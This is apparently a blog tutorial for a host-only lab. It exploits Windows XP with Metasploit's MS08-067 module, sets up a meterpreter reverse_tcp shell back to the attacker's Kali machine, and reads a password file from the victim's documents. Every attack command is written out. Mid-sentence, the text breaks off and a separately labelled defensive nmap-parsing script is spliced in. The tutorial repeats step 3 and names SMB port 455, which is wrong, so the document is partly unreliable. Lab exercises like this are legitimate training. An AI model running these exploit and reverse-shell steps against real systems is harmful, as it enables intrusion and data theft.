Friday, September 21, 2018

Using Metasploit to remotely access a Windows XP computer and read files.


Scenario 1

A Windows XP user is unaware of open ports on their system, leaving it vulnerable. The victim has a sensitive file in their My Documents folder. Our objective is to read that file and discover the nature of the sensitive information it contains.
Step 1: Starting up our virtual machines
We will assume that the reader has prior knowledge of installing virtual machine software such as Oracle VirtualBox or VMWare and setting up these virtual machines.
We will then create three virtual machines for our scenario: one target machine running Metasploitable 2; the Kali Linux machine, which has the Metasploit Framework installed; and finally the other target machine, running Windows XP, which we will try to exploit.


Figure 1 - Virtual Machines for scenario

Important notice: When running these machines, change the network settings in your virtual machine software so that they run on host-only connections. This is important because the machines we are using are vulnerable, and giving them an internet connection or placing them on an unprotected network would leave us open to attack.
Once you have started up these three machines you should see the following screens.

Figure 2 - Windows XP target machine with sensitive file on desktop




Figure 3 - Metasploitable 2 running


Figure 4 - Linux Kali with terminal open

Step 2: Finding the IP address of the target
For the following steps we will be entering text commands into the Kali Linux terminal as shown in Figure 4 - Linux Kali with terminal open. By entering the command netdiscover we will be presented with a list of IP addresses.

Figure 5 - List of IP addresses

We determined the target's IP address by comparing the IP addresses we already know (our own machines) against the list; the one that remained unknown was 192.168.152.128, so this is the IP address of the target. Write down the target's IP address for quick access later.
Step 3: Scan the target IP address for open ports
For this step we enter the following command into our Linux terminal: nmap -n -sV <Target IP Address>. For this scenario that is nmap -n -sV 192.168.152.128, which scans the target's system for any open ports that we can exploit.

Figure 6 - nmap scan for open ports

Now we can see a list of the open ports on the target's system; write these down for later use. Note that the target is running Windows XP. This is important for the following step, as we will want to learn what
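Seen from the defender's side, the same nmap output is an inventory signal: a host that exposes SMB (ports 139/445) and whose banners name an end-of-life Windows is exactly the kind of system this lab exploits. The following Python script is an added example, not part of the original post; it parses a constructed sample of nmap -n -sV output modelled on this step (not the real Figure 6, and the second host 192.168.152.131 is made up) and reports which hosts need isolation, patching or firewalling.

```python
import re

# Constructed sample of `nmap -n -sV` output modelled on Step 3; not the real Figure 6 (second host is made up).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.152.128
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.152.131
PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.4 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# SMB ports; exposing them on unpatched legacy Windows is the weakness this lab exploits.
SMB_PORTS = {139, 445}
LEGACY_OS_MARKERS = ("windows xp", "windows 2000", "windows server 2003")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")

def parse_nmap(text):
    """Return {host: [(port, service, version), ...]} from nmap normal output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            hosts[current].append((int(m.group(1)), m.group(2), m.group(3).strip()))
    return hosts

def assess(hosts):
    """Flag hosts exposing SMB; escalate when a banner names an end-of-life Windows."""
    findings = []
    for host, ports in hosts.items():
        smb_open = sorted(p for p, _, _ in ports if p in SMB_PORTS)
        banners = " ".join(version.lower() for _, _, version in ports)
        if smb_open and any(marker in banners for marker in LEGACY_OS_MARKERS):
            findings.append((host, smb_open, "legacy Windows with SMB exposed: isolate, patch or block 139/445"))
        elif smb_open:
            findings.append((host, smb_open, "SMB exposed: verify patch level and restrict to trusted subnets"))
    return findings
```

Calling assess(parse_nmap(SAMPLE_NMAP_OUTPUT)) on the sample returns a single finding for 192.168.152.128 with ports [139, 445] and the legacy-Windows advice; the Linux host produces none.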


Step 3: Finding an exploit we can use
For this step we use the command msfconsole. This initialises an instance of the Metasploit Framework and gives us access to Metasploit's functionality.
At the msfconsole prompt (msf>) type the following command:
msf> search platform:"Windows XP SP3" type:exploit
This will list the available exploits. By doing an internet search and comparing the open ports against the available exploits, we see that we can use port 455 combined with exploit/windows/smb/ms08_067_netapi.


Figure 7 - Finding exploit

We can now select the exploit by entering the command msf> use exploit/windows/smb/ms08_067_netapi, then follow it with the show options command to see the settings we can configure for this package.


Figure 8 - Options listed for the exploit package

Step 4: Setup the exploit
This exploit allows us to gain remote access to the target's computer.
Now we need to set the RHOST option in Metasploit so that it knows which system is being targeted. We do this with the command set RHOST <Target IP Address>; using the IP address we wrote down earlier, we enter set RHOST 192.168.152.128 to set our target.


Figure 9 - Set RHOST target IP Address

Now we need to set the payload that we will be using. This is done with the command set payload windows/meterpreter/reverse_tcp. To check that this worked, use the show options command again and confirm that it now lists the payload options, as follows.


Figure 10 - Payload armed

Now we need to set the LHOST and LPORT options. LHOST is the IP address of our local Kali Linux machine, which we can find by running the ifconfig command in a new terminal. In my instance this IP is 192.168.152.130, so we use set LHOST 192.168.152.130 and set LPORT 6666.
Now we launch the exploit with the exploit command, which delivers our reverse shell “meterpreter” through the open port on the vulnerable target system. You will know it was successful when you see the following screen.


Figure 11 - Exploit launched, meterpreter reverse shell running

Step 5: Using meterpreter post-exploitation
For our scenario our goal is to find a text document on the target's desktop that contains sensitive information such as a password.
Now, using meterpreter, we can navigate the target's filesystem. By entering the command shell we drop into the native Windows XP command prompt. We then navigate to the user's My Documents with the command cd c:\Documents and Settings\Administrator\My Documents and use the DIR command to list the files in the user's documents. We spot a text file named Sensitive_File.txt and decide to investigate it.


Figure 12 - Browse target's file system


Figure 13 - Target's My Documents.

To read the contents of Sensitive_File.txt we use the command more Sensitive_File.txt, and we discover a password the user has for some missile system.


Figure 14 - Using more command



Figure 15 - Target machine viewing the file
